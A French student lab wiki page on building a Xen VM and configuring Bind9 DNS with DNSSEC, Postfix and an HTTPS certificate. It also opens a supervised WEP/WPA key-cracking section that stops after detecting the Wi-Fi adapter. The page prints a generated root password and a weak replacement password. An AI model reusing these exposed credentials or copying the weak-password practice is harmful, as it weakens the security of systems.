|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
